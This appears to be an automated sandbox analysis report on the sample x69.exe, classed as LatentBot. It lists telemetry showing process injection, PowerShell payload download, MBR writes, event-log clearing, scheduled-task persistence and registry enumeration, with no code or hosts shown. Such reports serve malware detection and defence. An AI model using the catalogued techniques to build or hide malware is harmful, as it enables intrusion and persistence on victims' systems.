Malware Analysis Report

2025-05-28 17:58

Sample ID 250519-y7lxcack71
Target x69.exe
SHA256 8ead895e1e76dc258954703305da5eed934eb7744eddf4d1b481c70fddefcef6
Tags
latentbot bootkit defense_evasion execution persistence trojan
score
10/10

Analysis Overview

score
10/10

SHA256

8ead895e1e76dc258954703305da5eed934eb7744eddf4d1b481c70fddefcef6

Threat Level: Known bad

The file x69.exe was found to be: Known bad.

Malicious Activity Summary

latentbot bootkit defense_evasion execution persistence trojan

Latentbot family

LatentBot

Suspicious use of NtCreateUserProcessOtherParentProcess

Command and Scripting Interpreter: PowerShell

Sets service image path in registry

Downloads MZ/PE file

Blocklisted process makes network request

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Indicator Removal: Clear Windows Event Logs

Enumerates connected drives

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Modifies registry class

Checks processor information in registry

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-05-19 20:25

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-05-19 20:25

Reported

2025-05-19 20:26

Platform

win10v2004-20250502-en

Max time kernel

33s

Max time network

38s

Command Line

winlogon.exe

Signatures

LatentBot

trojan latentbot

Latentbot family

latentbot

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3160 created 616 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\system32\winlogon.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" C:\Windows\System32\WaaSMedicAgent.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\x69.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\MasonKit.com N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\MasonKit.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx C:\Windows\System32\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\x69.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3160 set thread context of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\System32\mousocoreworker.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} C:\Windows\System32\mousocoreworker.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = <binary value omitted> C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018801257DB2EFD" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018801257DB2EFD" C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018801257DB2EFD = <binary value omitted> C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = <binary value omitted> C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = "\\\\?\\Volume{6746542D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c11525ea1ed9d0d7159ff70dbf7f87bd47271147dcfa922bb64e44b154675868" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = 9e1a053afcc8db01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = "\\\\?\\Volume{6746542D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c11525ea1ed9d0d7159ff70dbf7f87bd47271147dcfa922bb64e44b154675868" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = <binary value omitted> C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = ff856e3afcc8db01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = "0" C:\Windows\System32\RuntimeBroker.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\x69.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
